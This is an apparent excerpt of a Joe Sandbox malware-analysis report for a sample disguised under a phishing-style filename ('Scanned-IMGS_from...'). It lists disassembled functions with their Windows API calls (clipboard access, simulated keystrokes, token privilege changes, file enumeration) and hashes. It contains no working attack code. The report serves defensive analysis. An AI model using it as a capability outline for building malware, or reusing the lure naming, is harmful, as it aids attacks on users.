                                                        • Instruction Fuzzy Hash: D9018176200225ABCB28DF2DDD9196BB7A9EFC5364714843EF90ACB245E631E901C7A0
                                                        APIs
                                                        • __lock_file.LIBCMT ref: 00A44AD6
                                                          • Part of subcall function 00A48D68: __getptd_noexit.LIBCMT ref: 00A48D68
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: __getptd_noexit__lock_file
                                                        • String ID:
                                                        • API String ID: 2597487223-0
                                                        • Opcode ID: a9e17750985cfff999d8635604d7a72ab1713cd7eb80aea05acba7da042c0c9b
                                                        • Instruction ID: dd17688704e9bbf22dccc51b11c7d2066f2b23028d01749c40784ca87ade5977
                                                        • Opcode Fuzzy Hash: a9e17750985cfff999d8635604d7a72ab1713cd7eb80aea05acba7da042c0c9b
                                                        • Instruction Fuzzy Hash: 31F0C239940209EFDF61BF74CD0639F36A1AF88365F148525F424AA1D2CB7C8A51EF51
                                                        APIs
                                                        • FreeLibrary.KERNEL32(?,?,00AE62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00A24FDE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: FreeLibrary
                                                        • String ID:
                                                        • API String ID: 3664257935-0
                                                        • Opcode ID: e44313596461d787066b6081d56c21ad5c84d10b4c27a421771beab83fc51167
                                                        • Instruction ID: 9424987dd618282133848110998a7a7cd409f5a55159bd15d7fad6e3d9021a1a
                                                        • Opcode Fuzzy Hash: e44313596461d787066b6081d56c21ad5c84d10b4c27a421771beab83fc51167
                                                        • Instruction Fuzzy Hash: 38F03971509B22CFCB349F68E594822BBF1BF487293208A3EE1D682A10C732A844DF40
                                                        APIs
                                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00A409F4
                                                          • Part of subcall function 00A27D2C: _memmove.LIBCMT ref: 00A27D66
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: LongNamePath_memmove
                                                        • String ID:
                                                        • API String ID: 2514874351-0
                                                        • Opcode ID: a6dd25ff21c1ded91c7964969f09927beef717b0df268bbf3375d07fed993b29
                                                        • Instruction ID: b50897abec39dc646a4b168a089fc3165eb88721fce0e98a55974b365c1d7255
                                                        • Opcode Fuzzy Hash: a6dd25ff21c1ded91c7964969f09927beef717b0df268bbf3375d07fed993b29
                                                        • Instruction Fuzzy Hash: 89E07D329002285BC720D29C9C05FFA73ECDFC8390F0001B1FC0CC3204E9709C818690
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: __fread_nolock
                                                        • String ID:
                                                        • API String ID: 2638373210-0
                                                        • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                                        • Instruction ID: 2814e25f9456d4dacb14fd9c593fb1347a42a0e53b42928cd2911f288487b316
                                                        • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                                        • Instruction Fuzzy Hash: DFE09AB0618B009FEB789B24D814BE373E0AB06315F04091CF2AA83342EF63B8419B59
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: __wfsopen
                                                        • String ID:
                                                        • API String ID: 197181222-0
                                                        • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                        • Instruction ID: d118cffa3fab0346b27ccaefd6086e0f76ced4844b3f8899897d1bb6750584f1
                                                        • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                        • Instruction Fuzzy Hash: DBB0927A84020C77DE012E92EC02A593B1A9B80678F808020FB0C1C162A6B3EAA09689
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                        • Instruction ID: a2b32ab706954b5ec646d7c97f6e6e51b17328f3b8172b67dde5d19269538508
                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                        • Instruction Fuzzy Hash: 9431E579A00105EFC718DF58C481969F7B6FF99300B648AA5E60ACB651D731EDD1EBC0
                                                        APIs
                                                        • Sleep.KERNELBASE(000001F4), ref: 016922B1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1341240796.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1690000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID:
                                                        • API String ID: 3472027048-0
                                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                        • Instruction ID: 5a4d17210a1e6748ea73793577bdc2b4c1e1e4526e8fdcd7acd102da0ff27d19
                                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                        • Instruction Fuzzy Hash: 75E0E67494010EEFDF00EFB4D94969E7FB4EF04701F1041A5FD01D2281D6309D508A72
                                                        APIs
                                                          • Part of subcall function 00A22612: GetWindowLongW.USER32(?,000000EB), ref: 00A22623
                                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00AACE50
                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00AACE91
                                                        • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00AACED6
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00AACF00
                                                        • SendMessageW.USER32 ref: 00AACF29
                                                        • _wcsncpy.LIBCMT ref: 00AACFA1
                                                        • GetKeyState.USER32(00000011), ref: 00AACFC2
                                                        • GetKeyState.USER32(00000009), ref: 00AACFCF
                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00AACFE5
                                                        • GetKeyState.USER32(00000010), ref: 00AACFEF
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00AAD018
                                                        • SendMessageW.USER32 ref: 00AAD03F
                                                        • SendMessageW.USER32(?,00001030,?,00AAB602), ref: 00AAD145
                                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00AAD15B
                                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00AAD16E
                                                        • SetCapture.USER32(?), ref: 00AAD177
                                                        • ClientToScreen.USER32(?,?), ref: 00AAD1DC
                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00AAD1E9
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00AAD203
                                                        • ReleaseCapture.USER32 ref: 00AAD20E
                                                        • GetCursorPos.USER32(?), ref: 00AAD248
                                                        • ScreenToClient.USER32(?,?), ref: 00AAD255
                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00AAD2B1
                                                        • SendMessageW.USER32 ref: 00AAD2DF
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00AAD31C
                                                        • SendMessageW.USER32 ref: 00AAD34B
                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00AAD36C
                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00AAD37B
                                                        • GetCursorPos.USER32(?), ref: 00AAD39B
                                                        • ScreenToClient.USER32(?,?), ref: 00AAD3A8
                                                        • GetParent.USER32(?), ref: 00AAD3C8
                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00AAD431
                                                        • SendMessageW.USER32 ref: 00AAD462
                                                        • ClientToScreen.USER32(?,?), ref: 00AAD4C0
                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00AAD4F0
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00AAD51A
                                                        • SendMessageW.USER32 ref: 00AAD53D
                                                        • ClientToScreen.USER32(?,?), ref: 00AAD58F
                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00AAD5C3
                                                          • Part of subcall function 00A225DB: GetWindowLongW.USER32(?,000000EB), ref: 00A225EC
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00AAD65F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                        • String ID: @GUI_DRAGID$@U=u$F
                                                        • API String ID: 3977979337-1007936534
                                                        • Opcode ID: d1a97edccd2aa8e95bae6fb70431f61d7858393f8330d565ff85fec6a54a78d5
                                                        • Instruction ID: f1e878fb7bd28a2b876826a3004daffb431dbe65e02a5b277c3182781a0b552b
                                                        • Opcode Fuzzy Hash: d1a97edccd2aa8e95bae6fb70431f61d7858393f8330d565ff85fec6a54a78d5
                                                        • Instruction Fuzzy Hash: 6F42AD30204341EFD725CF68C984BAABBE5FF4A364F14092DF696972E1D7329851CB92
                                                        APIs
                                                        • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00AA873F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: %d/%02d/%02d$@U=u
                                                        • API String ID: 3850602802-2764005415
                                                        • Opcode ID: 42f42d974bc075e20878849b23a66fea114b50b63ed063e6c607f5bd27864bc9
                                                        • Instruction ID: 1508b41fb4b50ad038bba3abc930f55b1c72f5fbb59d4c15c1828ad5475f2383
                                                        • Opcode Fuzzy Hash: 42f42d974bc075e20878849b23a66fea114b50b63ed063e6c607f5bd27864bc9
                                                        • Instruction Fuzzy Hash: C512C071500245AFEB258F68CD49FAA7BB8EF4A710F244129F915EB2E1DF788941CB50
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _memmove$_memset
                                                        • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                        • API String ID: 1357608183-1798697756
                                                        • Opcode ID: 1a942bf26445d2231ef3f2dd998b34d87abebbceda72bc71cf489fa1eca2b141
                                                        • Instruction ID: 106987517d62d2e1d2d0021470761c293acc0a80a822c5bd977b53aa147456ce
                                                        • Opcode Fuzzy Hash: 1a942bf26445d2231ef3f2dd998b34d87abebbceda72bc71cf489fa1eca2b141
                                                        • Instruction Fuzzy Hash: 1E939176A00215DFDF24CF98C881BADB7B1FF48710F25C16AE959AB281E7749E81DB40
                                                        APIs
                                                        • GetForegroundWindow.USER32(00000000,?), ref: 00A24A3D
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A5DA8E
                                                        • IsIconic.USER32(?), ref: 00A5DA97
                                                        • ShowWindow.USER32(?,00000009), ref: 00A5DAA4
                                                        • SetForegroundWindow.USER32(?), ref: 00A5DAAE
                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00A5DAC4
                                                        • GetCurrentThreadId.KERNEL32 ref: 00A5DACB
                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00A5DAD7
                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 00A5DAE8
                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 00A5DAF0
                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 00A5DAF8
                                                        • SetForegroundWindow.USER32(?), ref: 00A5DAFB
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A5DB10
                                                        • keybd_event.USER32(00000012,00000000), ref: 00A5DB1B
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A5DB25
                                                        • keybd_event.USER32(00000012,00000000), ref: 00A5DB2A
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A5DB33
                                                        • keybd_event.USER32(00000012,00000000), ref: 00A5DB38
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A5DB42
                                                        • keybd_event.USER32(00000012,00000000), ref: 00A5DB47
                                                        • SetForegroundWindow.USER32(?), ref: 00A5DB4A
                                                        • AttachThreadInput.USER32(?,?,00000000), ref: 00A5DB71
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 4125248594-2988720461
                                                        • Opcode ID: ff19f41c79386f91883b79a9f93ea943552412535b62c7cfc3327c915dc1e89c
                                                        • Instruction ID: c5ab5785d41e881e146c5a41d65444a37a5649eaaa7291805d173640f93de6d3
                                                        • Opcode Fuzzy Hash: ff19f41c79386f91883b79a9f93ea943552412535b62c7cfc3327c915dc1e89c
                                                        • Instruction Fuzzy Hash: E9315071A40319BEEB35AFE19C49F7F7E6CEB45B51F114025FE04AA1D0D7B05901AAA0
                                                        APIs
                                                          • Part of subcall function 00A78CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A78D0D
                                                          • Part of subcall function 00A78CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A78D3A
                                                          • Part of subcall function 00A78CC3: GetLastError.KERNEL32 ref: 00A78D47
                                                        • _memset.LIBCMT ref: 00A7889B
                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00A788ED
                                                        • CloseHandle.KERNEL32(?), ref: 00A788FE
                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00A78915
                                                        • GetProcessWindowStation.USER32 ref: 00A7892E
                                                        • SetProcessWindowStation.USER32(00000000), ref: 00A78938
                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00A78952
                                                          • Part of subcall function 00A78713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00A78851), ref: 00A78728
                                                          • Part of subcall function 00A78713: CloseHandle.KERNEL32(?,?,00A78851), ref: 00A7873A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                        • String ID: $default$winsta0
                                                        • API String ID: 2063423040-1027155976
                                                        • Opcode ID: bb5b5373437c6a02898078396dc0db6b5fbbc3a93d2842afcbd19a36ce557c54
                                                        • Instruction ID: c92245bf96e77c3207e616028528e0914ee5798289b63aa4c9657803867829df
                                                        • Opcode Fuzzy Hash: bb5b5373437c6a02898078396dc0db6b5fbbc3a93d2842afcbd19a36ce557c54
                                                        • Instruction Fuzzy Hash: 4B816B71940249AFDF11DFE4DD49AEE7BB8EF04344F08C12AF918A61A1DB398E15DB60
                                                        APIs
                                                        • OpenClipboard.USER32(00AAF910), ref: 00A94284
                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 00A94292
                                                        • GetClipboardData.USER32(0000000D), ref: 00A9429A
                                                        • CloseClipboard.USER32 ref: 00A942A6
                                                        • GlobalLock.KERNEL32(00000000), ref: 00A942C2
                                                        • CloseClipboard.USER32 ref: 00A942CC
                                                        • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00A942E1
                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 00A942EE
                                                        • GetClipboardData.USER32(00000001), ref: 00A942F6
                                                        • GlobalLock.KERNEL32(00000000), ref: 00A94303
                                                        • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00A94337
                                                        • CloseClipboard.USER32 ref: 00A94447
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                        • String ID:
                                                        • API String ID: 3222323430-0
                                                        • Opcode ID: 66016c8ef818e250129802228a0cc30981bc5f1262b37ad947435c58a5067be7
                                                        • Instruction ID: 2f15036b8afc9509a5b29a1485a4c3414787a9e4bbb666eafc7c50d1b9a5e68e
                                                        • Opcode Fuzzy Hash: 66016c8ef818e250129802228a0cc30981bc5f1262b37ad947435c58a5067be7
                                                        • Instruction Fuzzy Hash: 31517C31304202AFDB15EFA4ED86FAF77E8AF89B00F104529F556D61E1DB7099068B62
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00A8C9F8
                                                        • FindClose.KERNEL32(00000000), ref: 00A8CA4C
                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A8CA71
                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A8CA88
                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A8CAAF
                                                        • __swprintf.LIBCMT ref: 00A8CAFB
                                                        • __swprintf.LIBCMT ref: 00A8CB3E
                                                          • Part of subcall function 00A27F41: _memmove.LIBCMT ref: 00A27F82
                                                        • __swprintf.LIBCMT ref: 00A8CB92
                                                          • Part of subcall function 00A438D8: __woutput_l.LIBCMT ref: 00A43931
                                                        • __swprintf.LIBCMT ref: 00A8CBE0
                                                          • Part of subcall function 00A438D8: __flsbuf.LIBCMT ref: 00A43953
                                                          • Part of subcall function 00A438D8: __flsbuf.LIBCMT ref: 00A4396B
                                                        • __swprintf.LIBCMT ref: 00A8CC2F
                                                        • __swprintf.LIBCMT ref: 00A8CC7E
                                                        • __swprintf.LIBCMT ref: 00A8CCCD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                        • API String ID: 3953360268-2428617273
                                                        • Opcode ID: f07dde37b45dc22f8b13a016f27f2156152785bd623842c35e7bb60c8f2519f4
                                                        • Instruction ID: c3de55b1d8e3ec283ffdf2d4db75be510b2ded5d3980df07d5cf3874d197e19d
                                                        • Opcode Fuzzy Hash: f07dde37b45dc22f8b13a016f27f2156152785bd623842c35e7bb60c8f2519f4
                                                        • Instruction Fuzzy Hash: 11A12FB2508315ABC704FBA4DA86DAFB7ECBF94700F404929F585D7191EB34DA09CB62
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 00A8F221
                                                        • _wcscmp.LIBCMT ref: 00A8F236
                                                        • _wcscmp.LIBCMT ref: 00A8F24D
                                                        • GetFileAttributesW.KERNEL32(?), ref: 00A8F25F
                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 00A8F279
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00A8F291
                                                        • FindClose.KERNEL32(00000000), ref: 00A8F29C
                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00A8F2B8
                                                        • _wcscmp.LIBCMT ref: 00A8F2DF
                                                        • _wcscmp.LIBCMT ref: 00A8F2F6
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00A8F308
                                                        • SetCurrentDirectoryW.KERNEL32(00ADA5A0), ref: 00A8F326
